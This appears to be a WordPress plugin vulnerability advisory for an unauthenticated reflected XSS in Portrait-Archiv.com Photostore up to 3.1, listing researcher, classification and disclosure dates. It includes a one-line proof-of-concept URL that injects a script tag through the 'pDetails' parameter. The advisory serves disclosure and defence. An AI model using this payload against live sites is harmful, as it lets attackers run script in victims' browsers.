WordPress Plugin Vulnerabilities
Portrait-Archiv.com Photostore <= 3.1 - Unauthenticated Reflected XSS
Description
The 'pDetails' GET parameter from the js/imageDetails.php was vulnerable to an unauthenticated reflected XSS attack.
Proof of Concept
http://www.example.com/wp-content/plugins/portrait-archiv-shop/js/imageDetails.php?pDetails=);});</script><script>alert("XSS")</script>
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Original Researcher
Ricardo Sanchez
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2019-09-03 (about 4 years ago)
Added
2019-09-04 (about 4 years ago)
Last Updated
2020-02-13 (about 4 years ago)